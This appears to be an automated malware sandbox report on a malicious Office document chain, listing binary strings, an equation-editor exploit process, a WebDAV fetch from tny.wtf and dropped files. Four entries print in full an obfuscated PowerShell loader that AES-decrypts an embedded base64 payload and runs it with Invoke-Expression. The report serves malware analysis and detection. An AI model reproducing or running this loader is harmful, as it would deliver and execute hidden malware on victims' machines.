              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\dnlib-fuscator-master win7\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: ~DFB88BC22996138750.TMP.0.drInitial sample: OLE indicators vbamacros = False
              Source: #U00d6DEME TAVS#U0130YES#U0130.xlsInitial sample: OLE indicators encrypted = True

              Data Obfuscation

              barindex
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI53245645968011423739588623973337CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIIfj5tD9O95CJERD65QS8cgd6mKhDFXu5KnhuNUHV8eN0Bizzo6XYsPUOr/naNJ9+K8DnwkvsZljh8/jDtCBlcE7JwBlipBYNS69FMVrYo8riAT/OCm+86aVfem+jS7xh93ssL6airSk1E4+mG3y/ys93bKWl7qe/OiIfd0sR1FM9xZhEYuwuHy/AU8FfHXTeSMPl/YzZJ+ERHVh+bArXV063XruUdd/cZK/At2Cd+nbGZfGFDj29bcydLi2HTao5Px2joIFcvB02gojNaG2SWau3s/c6HFNqHbJGGUvRutXMletl29tNTCgqa0tUwol3eukX7WxBG0I6W0I89mN4k+5nR4K2AK8APbfVOX2Kvv5Tano47cej4QtGlf3mt0SPlqwZ9JReU64MQQKkvdzo84oqAoQ+HKZ5+76sSvuVPLVPNwT4waP3/VLkFCFvdaX6peTauqLmO7Enf3jzdxLsVBi7+NpZvpR8FLnBqiZzlImiogkvR17bPAS5CpYJnW/spi74gNlfkH3Qds0UlhmZe/la2ja5Mjup7w5KWxVsHB7OS7tLShSyN7PC/qbynVi6PhL80r558jq+Epf/Jw5jd2cMqIeQ4mv2U7EHxT/brTG1G9P22Aeim3ofkuv8Q/SbtoTP/20JvRjQ8WJRpM/rpy0QrrdKIDxmHOj8D6rmtRQVNLhZ+QU80DQhyY621X7HrHP/CHEzyeyQZWYMrUUzD7owZM8RgeUNb1tZcnVUx5eYVO7nU46ipcNFuuOEq7bDkKPW3S8iF+x6isuilkSnxQGLGoiQ/3UQx1KT5knk+IGE6RsunZht35yevyQ39siNJMcED7UWj/p5RW4pseMzZxQl/ER7KgeB/ga2lAverkwIuezrF3ODu4Fwu5pnQAqjKIbiK2WSd3HqQ6ElDbZDPlYJnIiorFFgTexsUy6Oe4ME8KrjwDHFPmrWUYgSixHjBrs984Mgz6L5vb7M2/1oZiU1cR0qRdZy3k3VSR+EnkjMt7QgpSt+TbAem6N1XrXX9yzuPZHT3jK7lS4aHtIloD1MMXWuIFungQbKc9KeITySZskxIxzuGSwplqK0ziNU0ELPRdi1QwF3PH5FGpGbNrOTsh2BXgal6KV70rLlImHCB/8N7+Zv4j3XQUvj7YpMsgavK4CpP2Kc0q2QBsv7EQwDeKTCM8Lho0uj59AXofd0v7Z0vxAotnN5Mo4LmIYSm7KuWnX/7BetKCLQsfM4MXEXF6te/5nneOgTKpDRxwFFl4mVtKv5tMtOpWM/IW/h9086XNQd1JCqFrA3dwaQ9H6+RTfGXHWBLLV/H2MbX+G3rK+Am8FjxJeLV3vZ/qwk0O2aTk8NsmzYZcdfcOP03B9h/iEr7Se0SP/S6mlR/0wuzt7CmAPKp/CNPz0fC/0tV0xJ8NlgvvQQvk1Zz/ZXQQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI53245645968011423739588623973337CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIIfj5tD9O95CJERD65QS8cgd6mKhDFXu5KnhuNUHV8eN0Bizzo6XYsPUOr/naNJ9+K8DnwkvsZljh8/jDtCBlcE7JwBlipBYNS69FMVrYo8riAT/OCm+86aVfem+jS7xh93ssL6airSk1E4+mG3y/ys93bKWl7qe/OiIfd0sR1FM9xZhEYuwuHy/AU8FfHXTeSMPl/YzZJ+ERHVh+bArXV063XruUdd/cZK/At2Cd+nbGZfGFDj29bcydLi2HTao5Px2joIFcvB02gojNaG2SWau3s/c6HFNqHbJGGUvRutXMletl29tNTCgqa0tUwol3eukX7WxBG0I6W0I89mN4k+5nR4K2AK8APbfVOX2Kvv5Tano47cej4QtGlf3mt0SPlqwZ9JReU64MQQKkvdzo84oqAoQ+HKZ5+76sSvuVPLVPNwT4waP3/VLkFCFvdaX6peTauqLmO7Enf3jzdxLsVBi7+NpZvpR8FLnBqiZzlImiogkvR17bPAS5CpYJnW/spi74gNlfkH3Qds0UlhmZe/la2ja5Mjup7w5KWxVsHB7OS7tLShSyN7PC/qbynVi6PhL80r558jq+Epf/Jw5jd2cMqIeQ4mv2U7EHxT/brTG1G9P22Aeim3ofkuv8Q/SbtoTP/20JvRjQ8WJRpM/rpy0QrrdKIDxmHOj8D6rmtRQVNLhZ+QU80DQhyY621X7HrHP/CHEzyeyQZWYMrUUzD7owZM8RgeUNb1tZcnVUx5eYVO7nU46ipcNFuuOEq7bDkKPW3S8iF+x6isuilkSnxQGLGoiQ/3UQx1KT5knk+IGE6RsunZht35yevyQ39siNJMcED7UWj/p5RW4pseMzZxQl/ER7KgeB/ga2lAverkwIuezrF3ODu4Fwu5pnQAqjKIbiK2WSd3HqQ6ElDbZDPlYJnIiorFFgTexsUy6Oe4ME8KrjwDHFPmrWUYgSixHjBrs984Mgz6L5vb7M2/1oZiU1cR0qRdZy3k3VSR+EnkjMt7QgpSt+TbAem6N1XrXX9yzuPZHT3jK7lS4aHtIloD1MMXWuIFungQbKc9KeITySZskxIxzuGSwplqK0ziNU0ELPRdi1QwF3PH5FGpGbNrOTsh2BXgal6KV70rLlImHCB/8N7+Zv4j3XQUvj7YpMsgavK4CpP2Kc0q2QBsv7EQwDeKTCM8Lho0uj59AXofd0v7Z0vxAotnN5Mo4LmIYSm7KuWnX/7BetKCLQsfM4MXEXF6te/5nneOgTKpDRxwFFl4mVtKv5tMtOpWM/IW/h9086XNQd1JCqFrA3dwaQ9H6+RTfGXHWBLLV/H2MbX+G3rK+Am8FjxJeLV3vZ/qwk0O2aTk8NsmzYZcdfcOP03B9h/iEr7Se0SP/S6mlR/0wuzt7CmAPKp/CNPz0fC/0tV0xJ8NlgvvQQvk1Zz/ZXQQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI53245645968011423739588623973337CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIIfj5tD9O95CJERD65QS8cgd6mKhDFXu5KnhuNUHV8eN0Bizzo6XYsPUOr/naNJ9+K8DnwkvsZljh8/jDtCBlcE7JwBlipBYNS69FMVrYo8riAT/OCm+86aVfem+jS7xh93ssL6airSk1E4+mG3y/ys93bKWl7qe/OiIfd0sR1FM9xZhEYuwuHy/AU8FfHXTeSMPl/YzZJ+ERHVh+bArXV063XruUdd/cZK/At2Cd+nbGZfGFDj29bcydLi2HTao5Px2joIFcvB02gojNaG2SWau3s/c6HFNqHbJGGUvRutXMletl29tNTCgqa0tUwol3eukX7WxBG0I6W0I89mN4k+5nR4K2AK8APbfVOX2Kvv5Tano47cej4QtGlf3mt0SPlqwZ9JReU64MQQKkvdzo84oqAoQ+HKZ5+76sSvuVPLVPNwT4waP3/VLkFCFvdaX6peTauqLmO7Enf3jzdxLsVBi7+NpZvpR8FLnBqiZzlImiogkvR17bPAS5CpYJnW/spi74gNlfkH3Qds0UlhmZe/la2ja5Mjup7w5KWxVsHB7OS7tLShSyN7PC/qbynVi6PhL80r558jq+Epf/Jw5jd2cMqIeQ4mv2U7EHxT/brTG1G9P22Aeim3ofkuv8Q/SbtoTP/20JvRjQ8WJRpM/rpy0QrrdKIDxmHOj8D6rmtRQVNLhZ+QU80DQhyY621X7HrHP/CHEzyeyQZWYMrUUzD7owZM8RgeUNb1tZcnVUx5eYVO7nU46ipcNFuuOEq7bDkKPW3S8iF+x6isuilkSnxQGLGoiQ/3UQx1KT5knk+IGE6RsunZht35yevyQ39siNJMcED7UWj/p5RW4pseMzZxQl/ER7KgeB/ga2lAverkwIuezrF3ODu4Fwu5pnQAqjKIbiK2WSd3HqQ6ElDbZDPlYJnIiorFFgTexsUy6Oe4ME8KrjwDHFPmrWUYgSixHjBrs984Mgz6L5vb7M2/1oZiU1cR0qRdZy3k3VSR+EnkjMt7QgpSt+TbAem6N1XrXX9yzuPZHT3jK7lS4aHtIloD1MMXWuIFungQbKc9KeITySZskxIxzuGSwplqK0ziNU0ELPRdi1QwF3PH5FGpGbNrOTsh2BXgal6KV70rLlImHCB/8N7+Zv4j3XQUvj7YpMsgavK4CpP2Kc0q2QBsv7EQwDeKTCM8Lho0uj59AXofd0v7Z0vxAotnN5Mo4LmIYSm7KuWnX/7BetKCLQsfM4MXEXF6te/5nneOgTKpDRxwFFl4mVtKv5tMtOpWM/IW/h9086XNQd1JCqFrA3dwaQ9H6+RTfGXHWBLLV/H2MbX+G3rK+Am8FjxJeLV3vZ/qwk0O2aTk8NsmzYZcdfcOP03B9h/iEr7Se0SP/S6mlR/0wuzt7CmAPKp/CNPz0fC/0tV0xJ8NlgvvQQvk1Zz/ZXQQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI53245645968011423739588623973337CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIIfj5tD9O95CJERD65QS8cgd6mKhDFXu5KnhuNUHV8eN0Bizzo6XYsPUOr/naNJ9+K8DnwkvsZljh8/jDtCBlcE7JwBlipBYNS69FMVrYo8riAT/OCm+86aVfem+jS7xh93ssL6airSk1E4+mG3y/ys93bKWl7qe/OiIfd0sR1FM9xZhEYuwuHy/AU8FfHXTeSMPl/YzZJ+ERHVh+bArXV063XruUdd/cZK/At2Cd+nbGZfGFDj29bcydLi2HTao5Px2joIFcvB02gojNaG2SWau3s/c6HFNqHbJGGUvRutXMletl29tNTCgqa0tUwol3eukX7WxBG0I6W0I89mN4k+5nR4K2AK8APbfVOX2Kvv5Tano47cej4QtGlf3mt0SPlqwZ9JReU64MQQKkvdzo84oqAoQ+HKZ5+76sSvuVPLVPNwT4waP3/VLkFCFvdaX6peTauqLmO7Enf3jzdxLsVBi7+NpZvpR8FLnBqiZzlImiogkvR17bPAS5CpYJnW/spi74gNlfkH3Qds0UlhmZe/la2ja5Mjup7w5KWxVsHB7OS7tLShSyN7PC/qbynVi6PhL80r558jq+Epf/Jw5jd2cMqIeQ4mv2U7EHxT/brTG1G9P22Aeim3ofkuv8Q/SbtoTP/20JvRjQ8WJRpM/rpy0QrrdKIDxmHOj8D6rmtRQVNLhZ+QU80DQhyY621X7HrHP/CHEzyeyQZWYMrUUzD7owZM8RgeUNb1tZcnVUx5eYVO7nU46ipcNFuuOEq7bDkKPW3S8iF+x6isuilkSnxQGLGoiQ/3UQx1KT5knk+IGE6RsunZht35yevyQ39siNJMcED7UWj/p5RW4pseMzZxQl/ER7KgeB/ga2lAverkwIuezrF3ODu4Fwu5pnQAqjKIbiK2WSd3HqQ6ElDbZDPlYJnIiorFFgTexsUy6Oe4ME8KrjwDHFPmrWUYgSixHjBrs984Mgz6L5vb7M2/1oZiU1cR0qRdZy3k3VSR+EnkjMt7QgpSt+TbAem6N1XrXX9yzuPZHT3jK7lS4aHtIloD1MMXWuIFungQbKc9KeITySZskxIxzuGSwplqK0ziNU0ELPRdi1QwF3PH5FGpGbNrOTsh2BXgal6KV70rLlImHCB/8N7+Zv4j3XQUvj7YpMsgavK4CpP2Kc0q2QBsv7EQwDeKTCM8Lho0uj59AXofd0v7Z0vxAotnN5Mo4LmIYSm7KuWnX/7BetKCLQsfM4MXEXF6te/5nneOgTKpDRxwFFl4mVtKv5tMtOpWM/IW/h9086XNQd1JCqFrA3dwaQ9H6+RTfGXHWBLLV/H2MbX+G3rK+Am8FjxJeLV3vZ/qwk0O2aTk8NsmzYZcdfcOP03B9h/iEr7Se0SP/S6mlR/0wuzt7CmAPKp/CNPz0fC/0tV0xJ8NlgvvQQvk1Zz/ZXQQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 7_2_005EFAFA push ss; iretd 7_2_005EFB02
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 7_2_005FC38C pushad ; ret 7_2_005FC38D

              Persistence and Installation Behavior

              barindex
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\tny.wtf\DavWWWRootJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\tny.wtf\DavWWWRootJump to behavior
              Source: Office documentLLM: Score: 9 Reasons: The screenshot shows a visually prominent Microsoft Office logo with the text 'This document is protected' which can mislead users into thinking the document is legitimate. The instructions on the right side create a sense of urgency by directing the user to 'Enable Content' to view the document. This is a common tactic used in phishing attacks to trick users into enabling macros, which can then execute malicious code. Additionally, the use of the Microsoft Office branding impersonates a well-known and trusted brand, further increasing the likelihood of the user being deceived. The combination of these elements strongly suggests that the document could be malicious.
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile dump: createdsimplethingstogetbackteachingentirethingsaroundtheworldtogetmebackwiththefreatgreatthings_____________sesheismygirlalwayssheismy[1].doc.0.drJump to dropped file
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: C63FEFCD.doc.3.drJump to dropped file
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
